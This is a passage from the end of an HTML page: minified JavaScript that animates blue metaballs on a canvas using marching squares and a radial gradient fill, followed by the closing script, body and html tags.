        this.step = 5, this.width = t, this.height = i, this.wh = Math.min(t, i), this.sx = Math.floor(this.width / this.step), this.sy = Math.floor(this.height / this.step), this.paint = !1, this.metaFill = r(t, i, t, o, n), this.plx = [0, 0, 1, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0], this.ply = [0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 0, 1, 0, 1], this.mscases = [0, 3, 0, 3, 1, 3, 0, 3, 2, 2, 0, 2, 1, 1, 0], this.ix = [1, 0, -1, 0, 0, 1, 0, -1, -1, 0, 1, 0, 0, 1, 1, 0, 0, 0, 1, 1], this.grid = [], this.balls = [], this.iter = 0, this.sign = 1;
        for (var a = 0; a < (this.sx + 2) * (this.sy + 2); a++) this.grid[a] = new s(a % (this.sx + 2) * this.step, Math.floor(a / (this.sx + 2)) * this.step);
        for (var l = 0; l < e; l++) this.balls[l] = new h(this)
    };
    e.prototype.computeForce = function(t, i, s) {
        var h, e = s || t + i * (this.sx + 2);
        if (0 === t || 0 === i || t === this.sx || i === this.sy) h = .6 * this.sign;
        else {
            h = 0;
            for (var r = this.grid[e], o = 0, n; n = this.balls[o++];) h += n.size * n.size / (-2 * r.x * n.pos.x - 2 * r.y * n.pos.y + n.pos.magnitude + r.magnitude);
            h *= this.sign
        }
        return this.grid[e].force = h, h
    }, e.prototype.marchingSquares = function(t) {
        var i = t[0],
            s = t[1],
            h = t[2],
            e = i + s * (this.sx + 2);
        if (this.grid[e].computed === this.iter) return !1;
        for (var r, o = 0, n = 0; n < 4; n++) {
            var l = i + this.ix[n + 12] + (s + this.ix[n + 16]) * (this.sx + 2),
                d = this.grid[l].force;
            (d > 0 && this.sign < 0 || d < 0 && this.sign > 0 || !d) && (d = this.computeForce(i + this.ix[n + 12], s + this.ix[n + 16], l)), Math.abs(d) > 1 && (o += Math.pow(2, n))
        }
        if (15 === o) return [i, s - 1, !1];
        5 === o ? r = 2 === h ? 3 : 1 : 10 === o ? r = 3 === h ? 0 : 2 : (r = this.mscases[o], this.grid[e].computed = this.iter);
        var p = this.step / (Math.abs(Math.abs(this.grid[i + this.plx[4 * r + 2] + (s + this.ply[4 * r + 2]) * (this.sx + 2)].force) - 1) / Math.abs(Math.abs(this.grid[i + this.plx[4 * r + 3] + (s + this.ply[4 * r + 3]) * (this.sx + 2)].force) - 1) + 1);
        return a.lineTo(this.grid[i + this.plx[4 * r] + (s + this.ply[4 * r]) * (this.sx + 2)].x + this.ix[r] * p, this.grid[i + this.plx[4 * r + 1] + (s + this.ply[4 * r + 1]) * (this.sx + 2)].y + this.ix[r + 4] * p), this.paint = !0, [i + this.ix[r + 4], s + this.ix[r + 8], r]
    }, e.prototype.renderMetaballs = function() {
        for (var t = 0, i; i = this.balls[t++];) i.move();
        for (this.iter++, this.sign = -this.sign, this.paint = !1, a.fillStyle = this.metaFill, a.beginPath(), t = 0; i = this.balls[t++];) {
            var s = [Math.round(i.pos.x / this.step), Math.round(i.pos.y / this.step), !1];
            do {
                s = this.marchingSquares(s)
            } while (s);
            this.paint && (a.fill(), a.closePath(), a.beginPath(), this.paint = !1)
        }
    };
    var r = function(t, i, s, h, e) {
            var r = a.createRadialGradient(t / 1, i / 1, 0, t / 1, i / 1, s);
            return r.addColorStop(0, h), r.addColorStop(1, e), r
        },
        o = function() {
            requestAnimationFrame(o), a.clearRect(0, 0, n.width, n.height), t.renderMetaballs()
        },
        n = i.screen.inith("liquid", null, !0),
        a = n.ctx;
    n.resize(), t = new e(n.width, n.height, 6, "#438ee1", "#5BC1F6"), o()
  }();
  
  

</script>

</body>
</html>